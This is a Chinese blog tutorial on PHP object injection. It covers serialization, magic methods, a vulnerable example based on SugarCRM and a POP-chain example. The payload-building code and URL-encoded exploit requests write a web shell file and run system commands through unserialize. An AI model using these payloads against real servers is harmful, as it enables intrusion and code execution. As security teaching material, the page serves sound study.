PHP 的对象注入

最新推荐文章于 2024-03-10 11:53:42 发布
最新推荐文章于 2024-03-10 11:53:42 发布
阅读量1.3k 收藏 4
点赞数 1
分类专栏: # 信安文章

在理解对象注入之前要知道的一些东西。

PHP中的序列化

在说序列化之前,我记得以前有过这样一个疑问:为什么需要序列化?
后来我在网上搜到了这样一个回答很好的解决了我的疑问。

“你有一个应用程序,需要传一些数据给其它应用程序,但数据保存在你的进程的堆栈中,其它进程无法访问你的应用程序进程的堆栈,要想把你的程序的数据给其它程序使用,必须将数据以某种形式传给其它进程,这个‘某种形式’就是序列化 。”

写了一小段代码来查看PHP不同类型变量序列化后的样子。

<?php
    $v1 = 123;
    $v2 = 1.23;
    $v3 = '123';
    $v4 = true;
    $v5 = array();
    $v6 = array('key'=>1,2,3);
    class base{
    }
    class base2{
        public $v = '123';
    }
    $v7 = new base;
    $v8 = new base2;
    $i = 1;
    while($i < 9){
        echo serialize(${'v'.$i})."\n";		//PHP使用serialize函数进行序列化
        $i ++;
    }
?>

输出:

i:123;         		//整数类型:值;
d:1.23;        		//双精度类型
s:3:"123";     		//字符串类型:字符串长度:字符串的值;
b:1;           		//布尔类型,0或1
a:0:{}         		//数组类型:元素个数:{}
a:3:{s:3:"key";i:1;i:0;i:2;i:1;i:3;}
O:4:"base":0:{}		//对象类型:类名长度:类名:属性个数:{}
O:5:"base2":1:{s:1:"v";s:3:"123";}

可以看到变量序列化后会变成带有数据类型和值的字符串。其中数组的花括号里根据元素的键名和值(序列化后)依次排列,类对象的花括号里则是根据成员变量名和值(序列化后)依次排列。对象要留意的是只会序列化成员变量,而不会序列化其中的方法,执行序列化的代码还必须包含该类的定义。

PHP中的反序列化

反序列化就是将变量序列化后形成的字符串还原成原来的数据。可以写代码来看一下这个过程。

<?php
	$v1 = unserialize('s:3:"123";');	//PHP使用unserialize函数进行反序列化
	class base2{
        public $v;
    }
	$v2 = unserialize('O:5:"base2":1:{s:1:"v";s:3:"123";}');
	var_dump($v1);
	var_dump($v2);
?>

输出:

string(3) "123"
object(base2)#1 (1) {
  ["v"]=>
  string(3) "123"
}

可以看到反序列化后会得到原来的数据。要留意的是对象的反序列化代码中同样需要含有该类的定义。

PHP中的魔术方法

PHP的类含有一些实现特定功能的魔术方法,在对象注入的时候会用上这些方法。可以先来看一下这些方法的特点。

__construct()
在类实例化成对象的时候自动调用

__destruct()
在对象不再被使用时(将所有该对象的引用设为null)或者程序退出时自动调用

__sleep()
在对象被序列化前自动调用,该函数需要返回以类成员变量名作为元素的数组(该数组里的元素会影响类成员变量是否被序列化。只有出现在该数组元素里的类成员变量才会被序列化)

__wakeup()
在反序列化后自动调用

__toString()
在对象被当作字符串使用时自动调用

__invoke()
在对象被当作函数使用时自动调用

这里只是列了其中几个,PHP的类还包含一些用来实现属性和方法重载的魔术方法等等。
写代码来观察这些魔术方法被自动调用的过程。

<?php
	class Base{
		public $v1 = 123;
		public $v2 = '123';
		public function __construct(){
			echo "__construct is running.\n";
		}
		public function __destruct(){
			echo "__destruct is running.\n";
		}
		
		public function __sleep(){
			echo "__sleep is running.\n";
			return array('v1');		//这里只返回了v1,所以v2不会被序列化
		}
		public function __wakeup(){
			echo "__wakeup is running.\n";
		}
		public function __toString(){
			return "__toString is running.\n";
		}
		public function __invoke(){
			echo "__invoke is running.\n";
		}
	}
	$test = new Base();
	$s_test = serialize($test);
	print $s_test."\n";
	$us_test = unserialize($s_test);
	echo $test;
	$test();
?>

输出:

__construct is running.
__sleep is running.
O:4:"Base":1:{s:2:"v1";i:123;}
__wakeup is running.
__toString is running.
__invoke is running.
__destruct is running.
__destruct is running.

通过输出和之前的介绍,可以清楚的知道这些魔术方法在什么时候会被自动调用,这点对下面的对象注入是很重要的。

对象注入

往当前程序里注入一个定义好的类的对象。再结合类里的魔术方法中的一些存在安全问题的函数来进行攻击。这里可能造成的攻击是多种多样的,例如代码执行,SQLi等等。该类型漏洞高度依赖于魔术方法的自动触发特点。

对象注入漏洞出现的两个前提条件:

  1. unserialize的参数可控。
  2. 代码里有定义一个含有魔术方法的类,并且该方法里出现一些使用类成员变量作为参数的存在安全问题的函数。

简化之前SugarCRM v6.5.23对象注入漏洞写的一个代码例子:

<?php 	
	class CacheFile{
		protected $_localStore = array();
		protected $_cacheFileName = 'externalCache.php';
		protected $_cacheChanged = false;
		function __construct(){
			//some code...
		}
		function __destruct(){
			if($this->_cacheChanged)
				file_put_contents($this->_cacheFileName, serialize($this->_localStore));
		}
		function __wakeup(){
			//some code...
		}
	}
	$data = unserialize($_REQUEST['rest_data']);
?>

构造payload的代码:

<?php 
	 class CacheFile{
	 	protected $_localStore = '<?php phpinfo();?>';
	 	protected $_cacheFileName = 'shell.php';
	 	protected $_cacheChanged = true;
	 }
	 print urlencode(serialize(new CacheFile()));
?>

利用:

	
http://hack.lo/obi/?rest_data=O%3A9%3A%22CacheFile%22%3A3%3A{s%3A14%3A%22%00*%00_localStore%22%3Bs%3A18%3A%22%3C%3Fphp+phpinfo()%3B%3F%3E%22%3Bs%3A17%3A%22%00*%00_cacheFileName%22%3Bs%3A9%3A%22shell.php%22%3Bs%3A16%3A%22%00*%00_cacheChanged%22%3Bb%3A1%3B}

要留意类成员变量的访问限制关键字。

POP Chain

POP(Property-Oriented Programming),是Esser在2009年的时候提出的一个对象注入的利用方法。当你找到的魔术方法不可以直接利用,但它有调用其它方法或者使用其它的变量时,可以在其它的类中寻找同名的方法或是变量,直到到达一个可以利用的点。这样的攻击方法称为代码复用攻击(将内存中的代码片段一点一点的组合起来,并最终构造成一个可以利用的payload)。这个一步一步把代码连起来的攻击过程在PHP应用里被称为构造POP链对对象注入漏洞进行利用。
漏洞代码例子:

<?php 
	class Systeminfo{
		public $cmd = 'systeminfo';
		public function getinfo(){
			system($this->cmd);
		}
		public function show(){
			$this->getinfo();
		}
	}
	class Books{
		public $bookname = 'This is bookname!';
		public function show(){
			echo $this->bookname;
		}
	}
	class Display{
		public $handle;
		public function __construct(){
			$this->handle = new Books();
		}
		public function __destruct(){
			$this->handle->show();
		}
	}
	$data = unserialize($_REQUEST['data']);
?>

构造payload的代码:

<?php
	class Systeminfo{
		public $cmd = 'whoami';
	}
	class Display{
		public $handle;
		function __construct(){
			$this->handle = new Systeminfo;
		}
	}
	print serialize(new Display);
?>

利用:

	
http://hack.lo/obi/pop.php?data=O:7:"Display":1:{s:6:"handle";O:10:"Systeminfo":1:{s:3:"cmd";s:6:"whoami";}}

如何去发现该漏洞

  1. 寻找代码中参数可控的unserialize函数。
  2. 寻找类含有的魔术方法,观察找到的魔术方法的实现看能否被利用。

当找到一个参数可控的unserialize函数时,可以利用get_included_files来查看当前脚本包含有哪些文件,从而在这些文件里找有定义的类,再在这些类中找魔术方法。

参考

http://syssec.rub.de/media/emma/veroeffentlichungen/2014/09/10/POPChainGeneration-CCS14.pdf

FLy_鹏程万里
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
magicmapping:寻找可利用的 PHP 对象注入魔法方法的脚本
07-09
magicmapping.php 是一个脚本,旨在帮助利用 PHP 对象注入漏洞。 当包含在 PHP 文件中时,它将生成脚本中当前可用类中所有可能可用的魔法方法的列表。 这些方法也将被扫描以查找潜在危险的函数,例如 eval()...
php 类中use,php中的use有什么作用
weixin_28749363的博客
03-09 1702
php中的use的作用:引入命名空间下的文件,语法为:【use app\admin\model\LiveRecharge;】。use与【require_once】和【include】是不相同的,使用use的前提是文件已经包含进当前文件。php中use的作用是什么?PHP中的use、命名空间的理解看.Net中的命名空间和usingusing Ddd.Core;using Ddd.Core.Cachi...
PHP代码注入PHP代码注入漏洞
cc
03-06 5938
call_user_func()等函数都有调用其他函数的功能,其中的一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用意外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。以call_user_func($fun,$para)函数为例,该函数的第一个参数作为回调函数,后面的参数为回调函数的参数,将$para这个参数传递给$fun这个函数去执行。我们可以利用file_get_contents()函数,写入文件,该函数的作用在于将第二个参数作为内容写入到第一个参数的文件中。
对象注入的几种方式
iLoyo_的博客
03-10 441
⭐ 作者:小胡_不糊涂。
带你搞懂PHP对象注入详细教程
我的博客,不一样的自我表达
04-17 371
不过需要注意的是,利用场景不限于magic函数,也有一些方式可以在一半的函数中利用这个漏洞,打个比方,一个模块可能定义了一个叫get的函数进行一些敏感的操作,比如访问数据库,这就可能造成sql注入,取决于函数本身的操作。你可以看到,我们创建了一个对象,序列化了它(然后__sleep被调用),之后用序列化对象重建后的对象创建了另一个对象,接着php脚本结束的时候两个对象的__destruct都会被调用。事实上,利用这玩意的可能性有很多种,关键取决于应用程序的流程与,可用的类,与magic函数。
理解PHP对象注入
清枫逸寒
02-22 698
PHP对象注入并不是一种十分常见的漏洞,这种漏洞可能会比较难利用,但是这种漏洞可能比较危险。为了学习这种漏洞,首先需要理解基础的PHP代码。
PHP反序列化漏洞学习
qq_62078839的博客
07-14 326
序列化是将变量转换为可保存或传输的字符串的过程,反序列化就是在适当的时候把这个字符串再转化成原来的变量使用。序列化:反序列化: 例如: 输出的结果为: 在序列化后的结果中的字母标识为: 在这个代码中运用到了 __construct()魔术方法序列化魔术方法这里拿PIKACHU靶场一题来举例 这里给了一个例子我们看看源码 这里并没有出现什么危险函数但construct析构函数中有个打印字符串的函数我们可以利用XSS漏洞弹个窗......
带你搞懂PHP对象注入
主题模板站的博客
01-29 212
不过需要注意的是,利用场景不限于magic函数,也有一些方式可以在一半的函数中利用这个漏洞,打个比方,一个模块可能定义了一个叫get的函数进行一些敏感的操作,比如访问数据库,这就可能造成sql注入,取决于函数本身的操作。你可以看到,我们创建了一个对象,序列化了它(然后__sleep被调用),之后用序列化对象重建后的对象创建了另一个对象,接着php脚本结束的时候两个对象的__destruct都会被调用。事实上,利用这玩意的可能性有很多种,关键取决于应用程序的流程与,可用的类,与magic函数。
PHP的代码注入是什么意思?底层原理是什么?
长风破浪会有时的博客
05-13 319
当应用程序接收到用户提交的数据时,如果没有对数据进行充分的过滤和验证,攻击者就有可能通过构造恶意的输入,在应用程序中注入一些非法的代码。PHP的代码注入(Code Injection)指的是攻击者通过构造恶意的输入,在应用程序中注入一些非法的代码,从而在应用程序中执行攻击者的指令或代码。这种攻击方式通常会利用应用程序的漏洞,例如未对输入数据进行充分的过滤和验证,导致攻击者可以在应用程序中执行任意代码,造成严重的安全风险,如数据库被盗、系统崩溃等。
PHP代码注入PHP语言常见可注入函数以及PHP代码注入漏洞的利用实例
m0_64378913的博客
06-26 6364
目录1 PHP注入概述2 相关函数与语言结构2.1 eval()函数2.2 assert()函数2.3 preg_replace()函数2.4 call_user_func()函数2.5 动态函数`$a($b)`3 总结 1 PHP注入概述 RCE概念:remote command/code execute,远程命令/代码执行。 PHP代码执行:在WEB中,PHP代码执行是指应用程序过滤不严,用户可用通过请求将代码注入到应用中执行。 PHP代码注入与SQL注入比较: 其注入思想是类似的,均是构造语句绕过服务
深入讲解PHP对象注入(Object Injection)
12-19
虽然这篇文章叫做PHP对象注入,但是本质上还是和PHP的序列化的不正确使用有关。如果你阅读了PHP中的SESSION反序列化机制对序列化就会有一个大致的认识。PHP对象注入其实本质上也是由于序列化引起的。 基础知识 在php...
PHP序列化/对象注入漏洞分析
10-22
主要为大家详细介绍了PHP序列化/对象注入漏洞分析,PHP序列化/对象注入漏洞的利用,感兴趣的小伙伴们可以参考一下
php之sql注入
weixin_58782362的博客
07-25 665
X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,(通常一些网站的防注入功能会记录请求端真实IP地址并写入数据库or某文件[通过修改XXF头可以实现伪造IP]).数据请求格式,有些时候是base64加密,有些时候json加密,base64需要直接进行转换,json是用bp抓包后进行更改,直接在值上面。如果单引号被限制了,可以使用16进制(sql注入中,编码就不用单引号,路径、表名、数据库等)通过A网站的注入点直接拿到B网站的信息,但前提是需要root权限。
PHP POP链小结,梳理一下__destruct魔术方法
m0_73606240的博客
01-19 697
pop链小结
python学习导航.txt
05-06
python
node-v8.3.0-linux-s390x.tar.xz
最新发布
05-06
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
嵌入式微处理器设计及应用
05-06
摘要:为满足智能家居座椅的交互式运动控制需求,基于AT89S52设计了嵌入式座椅运动控制系统。使用VB.net设计了游戏手柄按键读取软件,并在此基础上设计了座椅运动控制软件,软件可分别在“手柄模式”和“鼠标模式”下与嵌入式座椅运动控制器通信,进而控制座椅进行加速、减速、正转和反转等运动;构建了控制系统实验装置,实验结果表明,“鼠标模式”下,通过鼠标点击控制软件上功能按钮可实现对座椅的准确运动控制;“手柄模式”下,游戏手柄不仅可控制座椅运动,还可同步控制电脑上运行的游戏或远程遥控车,实现浸入感较强的座椅运动娱乐应用。
2024年中国NFC RFID阅读器行业研究报告.docx
05-06
2024年中国NFC RFID阅读器行业研究报告
简单解释php 依赖注入
07-20
PHP 依赖注入是一种设计模式,用于解决对象之间的依赖关系。它通过将对象的依赖关系从代码中硬编码的方式改为通过外部传递依赖对象的方式来实现松耦合。 简单来说,依赖注入是将一个对象的依赖关系从内部创建对象的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值